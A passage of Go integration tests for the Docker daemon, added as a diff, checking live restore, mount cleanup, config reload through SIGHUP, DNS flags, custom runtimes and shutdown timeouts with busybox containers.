t.Assert(err, check.IsNil) + pid = strings.TrimSpace(pid) + + // Kill the daemon + if err := s.d.Kill(); err != nil { + t.Fatal(err) + } + + // kill the container + runCmd := exec.Command(ctrBinary, "--address", "unix:///var/run/docker/libcontainerd/docker-containerd.sock", "containers", "kill", cid) + if out, ec, err := runCommandWithOutput(runCmd); err != nil { + t.Fatalf("Failed to run ctr, ExitCode: %d, err: '%v' output: '%s' cid: '%s'\n", ec, err, out, cid) + } + + // Give time to containerd to process the command if we don't + // the exit event might be received after we do the inspect + pidCmd := exec.Command("kill", "-0", pid) + _, ec, _ := runCommandWithOutput(pidCmd) + for ec == 0 { + time.Sleep(1 * time.Second) + _, ec, _ = runCommandWithOutput(pidCmd) + } + + // restart the daemon + if err := s.d.Start(); err != nil { + t.Fatal(err) + } + + // Check that we've got the correct exit code + out, err := s.d.Cmd("inspect", "-f", "{{.State.ExitCode}}", cid) + t.Assert(err, check.IsNil) + + out = strings.TrimSpace(out) + if out != "143" { + t.Fatalf("Expected exit code '%s' got '%s' for container '%s'\n", "143", out, cid) + } + +} + +// os.Kill should kill daemon ungracefully, leaving behind live containers. +// The live containers should be known to the restarted daemon. Stopping +// them now, should remove the mounts. +func (s *DockerDaemonSuite) TestCleanupMountsAfterDaemonCrash(c *check.C) { + testRequires(c, DaemonIsLinux) + c.Assert(s.d.StartWithBusybox("--live-restore"), check.IsNil) + + out, err := s.d.Cmd("run", "-d", "busybox", "top") + c.Assert(err, check.IsNil, check.Commentf("Output: %s", out)) + id := strings.TrimSpace(out) + + c.Assert(s.d.cmd.Process.Signal(os.Kill), check.IsNil) + mountOut, err := ioutil.ReadFile("/proc/self/mountinfo") + c.Assert(err, check.IsNil, check.Commentf("Output: %s", mountOut)) + + // container mounts should exist even after daemon has crashed. + comment := check.Commentf("%s should stay mounted from older daemon start:\nDaemon root repository %s\n%s", id, s.d.folder, mountOut) + c.Assert(strings.Contains(string(mountOut), id), check.Equals, true, comment) + + // restart daemon. + if err := s.d.Restart("--live-restore"); err != nil { + c.Fatal(err) + } + + // container should be running. + out, err = s.d.Cmd("inspect", "--format={{.State.Running}}", id) + c.Assert(err, check.IsNil, check.Commentf("Output: %s", out)) + out = strings.TrimSpace(out) + if out != "true" { + c.Fatalf("Container %s expected to stay alive after daemon restart", id) + } + + // 'docker stop' should work. + out, err = s.d.Cmd("stop", id) + c.Assert(err, check.IsNil, check.Commentf("Output: %s", out)) + + // Now, container mounts should be gone. + mountOut, err = ioutil.ReadFile("/proc/self/mountinfo") + c.Assert(err, check.IsNil, check.Commentf("Output: %s", mountOut)) + comment = check.Commentf("%s is still mounted from older daemon start:\nDaemon root repository %s\n%s", id, s.d.folder, mountOut) + c.Assert(strings.Contains(string(mountOut), id), check.Equals, false, comment) +} + +// TestDaemonRestartWithUnpausedRunningContainer requires live restore of running containers. +func (s *DockerDaemonSuite) TestDaemonRestartWithUnpausedRunningContainer(t *check.C) { + // TODO(mlaventure): Not sure what would the exit code be on windows + testRequires(t, DaemonIsLinux) + if err := s.d.StartWithBusybox("--live-restore"); err != nil { + t.Fatal(err) + } + + cid, err := s.d.Cmd("run", "-d", "--name", "test", "busybox", "top") + defer s.d.Stop() + if err != nil { + t.Fatal(cid, err) + } + cid = strings.TrimSpace(cid) + + pid, err := s.d.Cmd("inspect", "-f", "{{.State.Pid}}", cid) + t.Assert(err, check.IsNil) + + // pause the container + if _, err := s.d.Cmd("pause", cid); err != nil { + t.Fatal(cid, err) + } + + // Kill the daemon + if err := s.d.Kill(); err != nil { + t.Fatal(err) + } + + // resume the container + result := icmd.RunCommand( + ctrBinary, + "--address", "unix:///var/run/docker/libcontainerd/docker-containerd.sock", + "containers", "resume", cid) + t.Assert(result, icmd.Matches, icmd.Success) + + // Give time to containerd to process the command if we don't + // the resume event might be received after we do the inspect + waitAndAssert(t, defaultReconciliationTimeout, func(*check.C) (interface{}, check.CommentInterface) { + result := icmd.RunCommand("kill", "-0", strings.TrimSpace(pid)) + return result.ExitCode, nil + }, checker.Equals, 0) + + // restart the daemon + if err := s.d.Start("--live-restore"); err != nil { + t.Fatal(err) + } + + // Check that we've got the correct status + out, err := s.d.Cmd("inspect", "-f", "{{.State.Status}}", cid) + t.Assert(err, check.IsNil) + + out = strings.TrimSpace(out) + if out != "running" { + t.Fatalf("Expected exit code '%s' got '%s' for container '%s'\n", "running", out, cid) + } + if _, err := s.d.Cmd("kill", cid); err != nil { + t.Fatal(err) + } +} + +// TestRunLinksChanged checks that creating a new container with the same name does not update links +// this ensures that the old, pre gh#16032 functionality continues on +func (s *DockerDaemonSuite) TestRunLinksChanged(c *check.C) { + testRequires(c, DaemonIsLinux) // Windows does not support links + err := s.d.StartWithBusybox() + c.Assert(err, check.IsNil) + + out, err := s.d.Cmd("run", "-d", "--name=test", "busybox", "top") + c.Assert(err, check.IsNil, check.Commentf(out)) + + out, err = s.d.Cmd("run", "--name=test2", "--link=test:abc", "busybox", "sh", "-c", "ping -c 1 abc") + c.Assert(err, check.IsNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "1 packets transmitted, 1 packets received") + + out, err = s.d.Cmd("rm", "-f", "test") + c.Assert(err, check.IsNil, check.Commentf(out)) + + out, err = s.d.Cmd("run", "-d", "--name=test", "busybox", "top") + c.Assert(err, check.IsNil, check.Commentf(out)) + out, err = s.d.Cmd("start", "-a", "test2") + c.Assert(err, check.NotNil, check.Commentf(out)) + c.Assert(out, check.Not(checker.Contains), "1 packets transmitted, 1 packets received") + + err = s.d.Restart() + c.Assert(err, check.IsNil) + out, err = s.d.Cmd("start", "-a", "test2") + c.Assert(err, check.NotNil, check.Commentf(out)) + c.Assert(out, check.Not(checker.Contains), "1 packets transmitted, 1 packets received") +} + +func (s *DockerDaemonSuite) TestDaemonStartWithoutColors(c *check.C) { + testRequires(c, DaemonIsLinux, NotPpc64le) + + infoLog := "\x1b[34mINFO\x1b" + + p, tty, err := pty.Open() + c.Assert(err, checker.IsNil) + defer func() { + tty.Close() + p.Close() + }() + + b := bytes.NewBuffer(nil) + go io.Copy(b, p) + + // Enable coloring explicitly + s.d.StartWithLogFile(tty, "--raw-logs=false") + s.d.Stop() + c.Assert(b.String(), checker.Contains, infoLog) + + b.Reset() + + // Disable coloring explicitly + s.d.StartWithLogFile(tty, "--raw-logs=true") + s.d.Stop() + c.Assert(b.String(), check.Not(checker.Contains), infoLog) +} + +func (s *DockerDaemonSuite) TestDaemonDebugLog(c *check.C) { + testRequires(c, DaemonIsLinux, NotPpc64le) + + debugLog := "\x1b[37mDEBU\x1b" + + p, tty, err := pty.Open() + c.Assert(err, checker.IsNil) + defer func() { + tty.Close() + p.Close() + }() + + b := bytes.NewBuffer(nil) + go io.Copy(b, p) + + s.d.StartWithLogFile(tty, "--debug") + s.d.Stop() + c.Assert(b.String(), checker.Contains, debugLog) +} + +func (s *DockerDaemonSuite) TestDaemonDiscoveryBackendConfigReload(c *check.C) { + testRequires(c, SameHostDaemon, DaemonIsLinux) + + // daemon config file + daemonConfig := `{ "debug" : false }` + configFile, err := ioutil.TempFile("", "test-daemon-discovery-backend-config-reload-config") + c.Assert(err, checker.IsNil, check.Commentf("could not create temp file for config reload")) + configFilePath := configFile.Name() + defer func() { + configFile.Close() + os.RemoveAll(configFile.Name()) + }() + + _, err = configFile.Write([]byte(daemonConfig)) + c.Assert(err, checker.IsNil) + + // --log-level needs to be set so that d.Start() doesn't add --debug causing + // a conflict with the config + err = s.d.Start("--config-file", configFilePath, "--log-level=info") + c.Assert(err, checker.IsNil) + + // daemon config file + daemonConfig = `{ + "cluster-store": "consul://consuladdr:consulport/some/path", + "cluster-advertise": "192.168.56.100:0", + "debug" : false + }` + + err = configFile.Truncate(0) + c.Assert(err, checker.IsNil) + _, err = configFile.Seek(0, os.SEEK_SET) + c.Assert(err, checker.IsNil) + + _, err = configFile.Write([]byte(daemonConfig)) + c.Assert(err, checker.IsNil) + + err = s.d.reloadConfig() + c.Assert(err, checker.IsNil, check.Commentf("error reloading daemon config")) + + out, err := s.d.Cmd("info") + c.Assert(err, checker.IsNil) + + c.Assert(out, checker.Contains, fmt.Sprintf("Cluster Store: consul://consuladdr:consulport/some/path")) + c.Assert(out, checker.Contains, fmt.Sprintf("Cluster Advertise: 192.168.56.100:0")) +} + +// Test for #21956 +func (s *DockerDaemonSuite) TestDaemonLogOptions(c *check.C) { + err := s.d.StartWithBusybox("--log-driver=syslog", "--log-opt=syslog-address=udp://127.0.0.1:514") + c.Assert(err, check.IsNil) + + out, err := s.d.Cmd("run", "-d", "--log-driver=json-file", "busybox", "top") + c.Assert(err, check.IsNil, check.Commentf(out)) + id := strings.TrimSpace(out) + + out, err = s.d.Cmd("inspect", "--format='{{.HostConfig.LogConfig}}'", id) + c.Assert(err, check.IsNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "{json-file map[]}") +} + +// Test case for #20936, #22443 +func (s *DockerDaemonSuite) TestDaemonMaxConcurrency(c *check.C) { + c.Assert(s.d.Start("--max-concurrent-uploads=6", "--max-concurrent-downloads=8"), check.IsNil) + + expectedMaxConcurrentUploads := `level=debug msg="Max Concurrent Uploads: 6"` + expectedMaxConcurrentDownloads := `level=debug msg="Max Concurrent Downloads: 8"` + content, _ := ioutil.ReadFile(s.d.logFile.Name()) + c.Assert(string(content), checker.Contains, expectedMaxConcurrentUploads) + c.Assert(string(content), checker.Contains, expectedMaxConcurrentDownloads) +} + +// Test case for #20936, #22443 +func (s *DockerDaemonSuite) TestDaemonMaxConcurrencyWithConfigFile(c *check.C) { + testRequires(c, SameHostDaemon, DaemonIsLinux) + + // daemon config file + configFilePath := "test.json" + configFile, err := os.Create(configFilePath) + c.Assert(err, checker.IsNil) + defer os.Remove(configFilePath) + + daemonConfig := `{ "max-concurrent-downloads" : 8 }` + fmt.Fprintf(configFile, "%s", daemonConfig) + configFile.Close() + c.Assert(s.d.Start(fmt.Sprintf("--config-file=%s", configFilePath)), check.IsNil) + + expectedMaxConcurrentUploads := `level=debug msg="Max Concurrent Uploads: 5"` + expectedMaxConcurrentDownloads := `level=debug msg="Max Concurrent Downloads: 8"` + content, _ := ioutil.ReadFile(s.d.logFile.Name()) + c.Assert(string(content), checker.Contains, expectedMaxConcurrentUploads) + c.Assert(string(content), checker.Contains, expectedMaxConcurrentDownloads) + + configFile, err = os.Create(configFilePath) + c.Assert(err, checker.IsNil) + daemonConfig = `{ "max-concurrent-uploads" : 7, "max-concurrent-downloads" : 9 }` + fmt.Fprintf(configFile, "%s", daemonConfig) + configFile.Close() + + syscall.Kill(s.d.cmd.Process.Pid, syscall.SIGHUP) + + time.Sleep(3 * time.Second) + + expectedMaxConcurrentUploads = `level=debug msg="Reset Max Concurrent Uploads: 7"` + expectedMaxConcurrentDownloads = `level=debug msg="Reset Max Concurrent Downloads: 9"` + content, _ = ioutil.ReadFile(s.d.logFile.Name()) + c.Assert(string(content), checker.Contains, expectedMaxConcurrentUploads) + c.Assert(string(content), checker.Contains, expectedMaxConcurrentDownloads) +} + +// Test case for #20936, #22443 +func (s *DockerDaemonSuite) TestDaemonMaxConcurrencyWithConfigFileReload(c *check.C) { + testRequires(c, SameHostDaemon, DaemonIsLinux) + + // daemon config file + configFilePath := "test.json" + configFile, err := os.Create(configFilePath) + c.Assert(err, checker.IsNil) + defer os.Remove(configFilePath) + + daemonConfig := `{ "max-concurrent-uploads" : null }` + fmt.Fprintf(configFile, "%s", daemonConfig) + configFile.Close() + c.Assert(s.d.Start(fmt.Sprintf("--config-file=%s", configFilePath)), check.IsNil) + + expectedMaxConcurrentUploads := `level=debug msg="Max Concurrent Uploads: 5"` + expectedMaxConcurrentDownloads := `level=debug msg="Max Concurrent Downloads: 3"` + content, _ := ioutil.ReadFile(s.d.logFile.Name()) + c.Assert(string(content), checker.Contains, expectedMaxConcurrentUploads) + c.Assert(string(content), checker.Contains, expectedMaxConcurrentDownloads) + + configFile, err = os.Create(configFilePath) + c.Assert(err, checker.IsNil) + daemonConfig = `{ "max-concurrent-uploads" : 1, "max-concurrent-downloads" : null }` + fmt.Fprintf(configFile, "%s", daemonConfig) + configFile.Close() + + syscall.Kill(s.d.cmd.Process.Pid, syscall.SIGHUP) + + time.Sleep(3 * time.Second) + + expectedMaxConcurrentUploads = `level=debug msg="Reset Max Concurrent Uploads: 1"` + expectedMaxConcurrentDownloads = `level=debug msg="Reset Max Concurrent Downloads: 3"` + content, _ = ioutil.ReadFile(s.d.logFile.Name()) + c.Assert(string(content), checker.Contains, expectedMaxConcurrentUploads) + c.Assert(string(content), checker.Contains, expectedMaxConcurrentDownloads) + + configFile, err = os.Create(configFilePath) + c.Assert(err, checker.IsNil) + daemonConfig = `{ "labels":["foo=bar"] }` + fmt.Fprintf(configFile, "%s", daemonConfig) + configFile.Close() + + syscall.Kill(s.d.cmd.Process.Pid, syscall.SIGHUP) + + time.Sleep(3 * time.Second) + + expectedMaxConcurrentUploads = `level=debug msg="Reset Max Concurrent Uploads: 5"` + expectedMaxConcurrentDownloads = `level=debug msg="Reset Max Concurrent Downloads: 3"` + content, _ = ioutil.ReadFile(s.d.logFile.Name()) + c.Assert(string(content), checker.Contains, expectedMaxConcurrentUploads) + c.Assert(string(content), checker.Contains, expectedMaxConcurrentDownloads) +} + +func (s *DockerDaemonSuite) TestBuildOnDisabledBridgeNetworkDaemon(c *check.C) { + err := s.d.StartWithBusybox("-b=none", "--iptables=false") + c.Assert(err, check.IsNil) + s.d.c.Logf("dockerBinary %s", dockerBinary) + out, code, err := s.d.buildImageWithOut("busyboxs", + `FROM busybox + RUN cat /etc/hosts`, false) + comment := check.Commentf("Failed to build image. output %s, exitCode %d, err %v", out, code, err) + c.Assert(err, check.IsNil, comment) + c.Assert(code, check.Equals, 0, comment) +} + +// Test case for #21976 +func (s *DockerDaemonSuite) TestDaemonDNSInHostMode(c *check.C) { + testRequires(c, SameHostDaemon, DaemonIsLinux) + + err := s.d.StartWithBusybox("--dns", "1.2.3.4") + c.Assert(err, checker.IsNil) + + expectedOutput := "nameserver 1.2.3.4" + out, _ := s.d.Cmd("run", "--net=host", "busybox", "cat", "/etc/resolv.conf") + c.Assert(out, checker.Contains, expectedOutput, check.Commentf("Expected '%s', but got %q", expectedOutput, out)) +} + +// Test case for #21976 +func (s *DockerDaemonSuite) TestDaemonDNSSearchInHostMode(c *check.C) { + testRequires(c, SameHostDaemon, DaemonIsLinux) + + err := s.d.StartWithBusybox("--dns-search", "example.com") + c.Assert(err, checker.IsNil) + + expectedOutput := "search example.com" + out, _ := s.d.Cmd("run", "--net=host", "busybox", "cat", "/etc/resolv.conf") + c.Assert(out, checker.Contains, expectedOutput, check.Commentf("Expected '%s', but got %q", expectedOutput, out)) +} + +// Test case for #21976 +func (s *DockerDaemonSuite) TestDaemonDNSOptionsInHostMode(c *check.C) { + testRequires(c, SameHostDaemon, DaemonIsLinux) + + err := s.d.StartWithBusybox("--dns-opt", "timeout:3") + c.Assert(err, checker.IsNil) + + expectedOutput := "options timeout:3" + out, _ := s.d.Cmd("run", "--net=host", "busybox", "cat", "/etc/resolv.conf") + c.Assert(out, checker.Contains, expectedOutput, check.Commentf("Expected '%s', but got %q", expectedOutput, out)) +} + +func (s *DockerDaemonSuite) TestRunWithRuntimeFromConfigFile(c *check.C) { + conf, err := ioutil.TempFile("", "config-file-") + c.Assert(err, check.IsNil) + configName := conf.Name() + conf.Close() + defer os.Remove(configName) + + config := ` +{ + "runtimes": { + "oci": { + "path": "docker-runc" + }, + "vm": { + "path": "/usr/local/bin/vm-manager", + "runtimeArgs": [ + "--debug" + ] + } + } +} +` + ioutil.WriteFile(configName, []byte(config), 0644) + err = s.d.StartWithBusybox("--config-file", configName) + c.Assert(err, check.IsNil) + + // Run with default runtime + out, err := s.d.Cmd("run", "--rm", "busybox", "ls") + c.Assert(err, check.IsNil, check.Commentf(out)) + + // Run with default runtime explicitly + out, err = s.d.Cmd("run", "--rm", "--runtime=runc", "busybox", "ls") + c.Assert(err, check.IsNil, check.Commentf(out)) + + // Run with oci (same path as default) but keep it around + out, err = s.d.Cmd("run", "--name", "oci-runtime-ls", "--runtime=oci", "busybox", "ls") + c.Assert(err, check.IsNil, check.Commentf(out)) + + // Run with "vm" + out, err = s.d.Cmd("run", "--rm", "--runtime=vm", "busybox", "ls") + c.Assert(err, check.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "/usr/local/bin/vm-manager: no such file or directory") + + // Reset config to only have the default + config = ` +{ + "runtimes": { + } +} +` + ioutil.WriteFile(configName, []byte(config), 0644) + syscall.Kill(s.d.cmd.Process.Pid, syscall.SIGHUP) + // Give daemon time to reload config + <-time.After(1 * time.Second) + + // Run with default runtime + out, err = s.d.Cmd("run", "--rm", "--runtime=runc", "busybox", "ls") + c.Assert(err, check.IsNil, check.Commentf(out)) + + // Run with "oci" + out, err = s.d.Cmd("run", "--rm", "--runtime=oci", "busybox", "ls") + c.Assert(err, check.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "Unknown runtime specified oci") + + // Start previously created container with oci + out, err = s.d.Cmd("start", "oci-runtime-ls") + c.Assert(err, check.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "Unknown runtime specified oci") + + // Check that we can't override the default runtime + config = ` +{ + "runtimes": { + "runc": { + "path": "my-runc" + } + } +} +` + ioutil.WriteFile(configName, []byte(config), 0644) + syscall.Kill(s.d.cmd.Process.Pid, syscall.SIGHUP) + // Give daemon time to reload config + <-time.After(1 * time.Second) + + content, _ := ioutil.ReadFile(s.d.logFile.Name()) + c.Assert(string(content), checker.Contains, `file configuration validation failed (runtime name 'runc' is reserved)`) + + // Check that we can select a default runtime + config = ` +{ + "default-runtime": "vm", + "runtimes": { + "oci": { + "path": "docker-runc" + }, + "vm": { + "path": "/usr/local/bin/vm-manager", + "runtimeArgs": [ + "--debug" + ] + } + } +} +` + ioutil.WriteFile(configName, []byte(config), 0644) + syscall.Kill(s.d.cmd.Process.Pid, syscall.SIGHUP) + // Give daemon time to reload config + <-time.After(1 * time.Second) + + out, err = s.d.Cmd("run", "--rm", "busybox", "ls") + c.Assert(err, check.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "/usr/local/bin/vm-manager: no such file or directory") + + // Run with default runtime explicitly + out, err = s.d.Cmd("run", "--rm", "--runtime=runc", "busybox", "ls") + c.Assert(err, check.IsNil, check.Commentf(out)) +} + +func (s *DockerDaemonSuite) TestRunWithRuntimeFromCommandLine(c *check.C) { + err := s.d.StartWithBusybox("--add-runtime", "oci=docker-runc", "--add-runtime", "vm=/usr/local/bin/vm-manager") + c.Assert(err, check.IsNil) + + // Run with default runtime + out, err := s.d.Cmd("run", "--rm", "busybox", "ls") + c.Assert(err, check.IsNil, check.Commentf(out)) + + // Run with default runtime explicitly + out, err = s.d.Cmd("run", "--rm", "--runtime=runc", "busybox", "ls") + c.Assert(err, check.IsNil, check.Commentf(out)) + + // Run with oci (same path as default) but keep it around + out, err = s.d.Cmd("run", "--name", "oci-runtime-ls", "--runtime=oci", "busybox", "ls") + c.Assert(err, check.IsNil, check.Commentf(out)) + + // Run with "vm" + out, err = s.d.Cmd("run", "--rm", "--runtime=vm", "busybox", "ls") + c.Assert(err, check.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "/usr/local/bin/vm-manager: no such file or directory") + + // Start a daemon without any extra runtimes + s.d.Stop() + err = s.d.StartWithBusybox() + c.Assert(err, check.IsNil) + + // Run with default runtime + out, err = s.d.Cmd("run", "--rm", "--runtime=runc", "busybox", "ls") + c.Assert(err, check.IsNil, check.Commentf(out)) + + // Run with "oci" + out, err = s.d.Cmd("run", "--rm", "--runtime=oci", "busybox", "ls") + c.Assert(err, check.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "Unknown runtime specified oci") + + // Start previously created container with oci + out, err = s.d.Cmd("start", "oci-runtime-ls") + c.Assert(err, check.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "Unknown runtime specified oci") + + // Check that we can't override the default runtime + s.d.Stop() + err = s.d.Start("--add-runtime", "runc=my-runc") + c.Assert(err, check.NotNil) + + content, _ := ioutil.ReadFile(s.d.logFile.Name()) + c.Assert(string(content), checker.Contains, `runtime name 'runc' is reserved`) + + // Check that we can select a default runtime + s.d.Stop() + err = s.d.StartWithBusybox("--default-runtime=vm", "--add-runtime", "oci=docker-runc", "--add-runtime", "vm=/usr/local/bin/vm-manager") + c.Assert(err, check.IsNil) + + out, err = s.d.Cmd("run", "--rm", "busybox", "ls") + c.Assert(err, check.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "/usr/local/bin/vm-manager: no such file or directory") + + // Run with default runtime explicitly + out, err = s.d.Cmd("run", "--rm", "--runtime=runc", "busybox", "ls") + c.Assert(err, check.IsNil, check.Commentf(out)) +} + +func (s *DockerDaemonSuite) TestDaemonRestartWithAutoRemoveContainer(c *check.C) { + err := s.d.StartWithBusybox() + c.Assert(err, checker.IsNil) + + // top1 will exist after daemon restarts + out, err := s.d.Cmd("run", "-d", "--name", "top1", "busybox:latest", "top") + c.Assert(err, checker.IsNil, check.Commentf("run top1: %v", out)) + // top2 will be removed after daemon restarts + out, err = s.d.Cmd("run", "-d", "--rm", "--name", "top2", "busybox:latest", "top") + c.Assert(err, checker.IsNil, check.Commentf("run top2: %v", out)) + + out, err = s.d.Cmd("ps") + c.Assert(out, checker.Contains, "top1", check.Commentf("top1 should be running")) + c.Assert(out, checker.Contains, "top2", check.Commentf("top2 should be running")) + + // now restart daemon gracefully + err = s.d.Restart() + c.Assert(err, checker.IsNil) + + out, err = s.d.Cmd("ps", "-a") + c.Assert(err, checker.IsNil, check.Commentf("out: %v", out)) + c.Assert(out, checker.Contains, "top1", check.Commentf("top1 should exist after daemon restarts")) + c.Assert(out, checker.Not(checker.Contains), "top2", check.Commentf("top2 should be removed after daemon restarts")) +} + +func (s *DockerDaemonSuite) TestDaemonRestartSaveContainerExitCode(c *check.C) { + err := s.d.StartWithBusybox() + c.Assert(err, checker.IsNil) + + containerName := "error-values" + // Make a container with both a non 0 exit code and an error message + out, err := s.d.Cmd("run", "--name", containerName, "busybox", "toto") + c.Assert(err, checker.NotNil) + + // Check that those values were saved on disk + out, err = s.d.Cmd("inspect", "-f", "{{.State.ExitCode}}", containerName) + out = strings.TrimSpace(out) + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Equals, "127") + + out, err = s.d.Cmd("inspect", "-f", "{{.State.Error}}", containerName) + out = strings.TrimSpace(out) + c.Assert(err, checker.IsNil) + + // now restart daemon + err = s.d.Restart() + c.Assert(err, checker.IsNil) + + // Check that those values are still around + out, err = s.d.Cmd("inspect", "-f", "{{.State.ExitCode}}", containerName) + out = strings.TrimSpace(out) + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Equals, "127") + + out, err = s.d.Cmd("inspect", "-f", "{{.State.Error}}", containerName) + out = strings.TrimSpace(out) + c.Assert(err, checker.IsNil) +} + +func (s *DockerDaemonSuite) TestDaemonBackcompatPre17Volumes(c *check.C) { + testRequires(c, SameHostDaemon) + d := s.d + err := d.StartWithBusybox() + c.Assert(err, checker.IsNil) + + // hack to be able to side-load a container config + out, err := d.Cmd("create", "busybox:latest") + c.Assert(err, checker.IsNil, check.Commentf(out)) + id := strings.TrimSpace(out) + + out, err = d.Cmd("inspect", "--type=image", "--format={{.ID}}", "busybox:latest") + c.Assert(err, checker.IsNil, check.Commentf(out)) + c.Assert(d.Stop(), checker.IsNil) + <-d.wait + + imageID := strings.TrimSpace(out) + volumeID := stringid.GenerateNonCryptoID() + vfsPath := filepath.Join(d.root, "vfs", "dir", volumeID) + c.Assert(os.MkdirAll(vfsPath, 0755), checker.IsNil) + + config := []byte(` + { + "ID": "` + id + `", + "Name": "hello", + "Driver": "` + d.storageDriver + `", + "Image": "` + imageID + `", + "Config": {"Image": "busybox:latest"}, + "NetworkSettings": {}, + "Volumes": { + "/bar":"/foo", + "/foo": "` + vfsPath + `", + "/quux":"/quux" + }, + "VolumesRW": { + "/bar": true, + "/foo": true, + "/quux": false + } + } + `) + + configPath := filepath.Join(d.root, "containers", id, "config.v2.json") + err = ioutil.WriteFile(configPath, config, 600) + err = d.Start() + c.Assert(err, checker.IsNil) + + out, err = d.Cmd("inspect", "--type=container", "--format={{ json .Mounts }}", id) + c.Assert(err, checker.IsNil, check.Commentf(out)) + type mount struct { + Name string + Source string + Destination string + Driver string + RW bool + } + + ls := []mount{} + err = json.NewDecoder(strings.NewReader(out)).Decode(&ls) + c.Assert(err, checker.IsNil) + + expected := []mount{ + {Source: "/foo", Destination: "/bar", RW: true}, + {Name: volumeID, Destination: "/foo", RW: true}, + {Source: "/quux", Destination: "/quux", RW: false}, + } + c.Assert(ls, checker.HasLen, len(expected)) + + for _, m := range ls { + var matched bool + for _, x := range expected { + if m.Source == x.Source && m.Destination == x.Destination && m.RW == x.RW || m.Name != x.Name { + matched = true + break + } + } + c.Assert(matched, checker.True, check.Commentf("did find match for %+v", m)) + } +} + +func (s *DockerDaemonSuite) TestDaemonWithUserlandProxyPath(c *check.C) { + testRequires(c, SameHostDaemon, DaemonIsLinux) + + dockerProxyPath, err := exec.LookPath("docker-proxy") + c.Assert(err, checker.IsNil) + tmpDir, err := ioutil.TempDir("", "test-docker-proxy") + c.Assert(err, checker.IsNil) + + newProxyPath := filepath.Join(tmpDir, "docker-proxy") + cmd := exec.Command("cp", dockerProxyPath, newProxyPath) + c.Assert(cmd.Run(), checker.IsNil) + + // custom one + c.Assert(s.d.StartWithBusybox("--userland-proxy-path", newProxyPath), checker.IsNil) + out, err := s.d.Cmd("run", "-p", "5000:5000", "busybox:latest", "true") + c.Assert(err, checker.IsNil, check.Commentf(out)) + + // try with the original one + c.Assert(s.d.Restart("--userland-proxy-path", dockerProxyPath), checker.IsNil) + out, err = s.d.Cmd("run", "-p", "5000:5000", "busybox:latest", "true") + c.Assert(err, checker.IsNil, check.Commentf(out)) + + // not exist + c.Assert(s.d.Restart("--userland-proxy-path", "/does/not/exist"), checker.IsNil) + out, err = s.d.Cmd("run", "-p", "5000:5000", "busybox:latest", "true") + c.Assert(err, checker.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "driver failed programming external connectivity on endpoint") + c.Assert(out, checker.Contains, "/does/not/exist: no such file or directory") +} + +// Test case for #22471 +func (s *DockerDaemonSuite) TestDaemonShutdownTimeout(c *check.C) { + testRequires(c, SameHostDaemon) + + c.Assert(s.d.StartWithBusybox("--shutdown-timeout=3"), check.IsNil) + + _, err := s.d.Cmd("run", "-d", "busybox", "top") + c.Assert(err, check.IsNil) + + syscall.Kill(s.d.cmd.Process.Pid, syscall.SIGINT) + + select { + case <-s.d.wait: + case <-time.After(5 * time.Second): + } + + expectedMessage := `level=debug msg="start clean shutdown of all containers with a 3 seconds timeout..."` + content, _ := ioutil.ReadFile(s.d.logFile.Name()) + c.Assert(string(content), checker.Contains, expectedMessage) +} + +// Test case for #22471 +func (s *DockerDaemonSuite) TestDaemonShutdownTimeoutWithConfigFile(c *check.C) { + testRequires(c, SameHostDaemon) + + // daemon config file + configFilePath := "test.json" + configFile, err := os.Create(configFilePath) + c.Assert(err, checker.IsNil) + defer os.Remove(configFilePath) + + daemonConfig := `{ "shutdown-timeout" : 8 }` + fmt.Fprintf(configFile, "%s", daemonConfig) + configFile.Close() + c.Assert(s.d.Start(fmt.Sprintf("--config-file=%s", configFilePath)), check.IsNil) + + configFile, err = os.Create(configFilePath) + c.Assert(err, checker.IsNil) + daemonConfig = `{ "shutdown-timeout" : 5 }` + fmt.Fprintf(configFile, "%s", daemonConfig) + configFile.Close() + + syscall.Kill(s.d.cmd.Process.Pid, syscall.SIGHUP) + + select { + case <-s.d.wait: + case <-time.After(3 * time.Second): + } + + expectedMessage := `level=debug msg="Reset Shutdown Timeout: 5"` + content, _ := ioutil.ReadFile(s.d.logFile.Name()) + c.Assert(string(content), checker.Contains, expectedMessage) +} + +// Test case for 29342 +func (s *DockerDaemonSuite) TestExecWithUserAfterLiveRestore(c *check.C) { + testRequires(c, DaemonIsLinux) + s.d.StartWithBusybox("--live-restore") + + out, err := s.d.Cmd("run", "-d", "--name=top", "busybox", "sh", "-c", "addgroup -S test && adduser -S -G test test -D -s /bin/sh && top") + c.Assert(err, check.IsNil, check.Commentf("Output: %s", out)) + + s.d.waitRun("top") + + out1, err := s.d.Cmd("exec", "-u", "test", "top", "id") + // uid=100(test) gid=101(test) groups=101(test) + c.Assert(err, check.IsNil, check.Commentf("Output: %s", out1)) + + // restart daemon. + s.d.Restart("--live-restore") + + out2, err := s.d.Cmd("exec", "-u", "test", "top", "id") + c.Assert(err, check.IsNil, check.Commentf("Output: %s", out2)) + c.Assert(out1, check.Equals, out2, check.Commentf("Output: before restart '%s', after restart '%s'", out1, out2)) + + out, err = s.d.Cmd("stop", "top") + c.Assert(err, check.IsNil, check.Commentf("Output: %s", out)) +} + +func (s *DockerDaemonSuite) TestRemoveContainerAfterLiveRestore(c *check.C) { + testRequires(c, DaemonIsLinux, overlayFSSupported, SameHostDaemon) + s.d.StartWithBusybox("--live-restore", "--storage-driver", "overlay") + out, err := s.d.Cmd("run", "-d", "--name=top", "busybox", "top") + c.Assert(err, check.IsNil, check.Commentf("Output: %s", out)) + + s.d.waitRun("top") + + // restart daemon. + s.d.Restart("--live-restore", "--storage-driver", "overlay") + + out, err = s.d.Cmd("stop", "top") + c.Assert(err, check.IsNil, check.Commentf("Output: %s", out)) + + // test if the rootfs mountpoint still exist + mountpoint, err := s.d.inspectFilter("top", ".GraphDriver.Data.MergedDir") + c.Assert(err, check.IsNil) + f, err := os.Open("/proc/self/mountinfo") + c.Assert(err, check.IsNil) + defer f.Close() + sc := bufio.NewScanner(f) + for 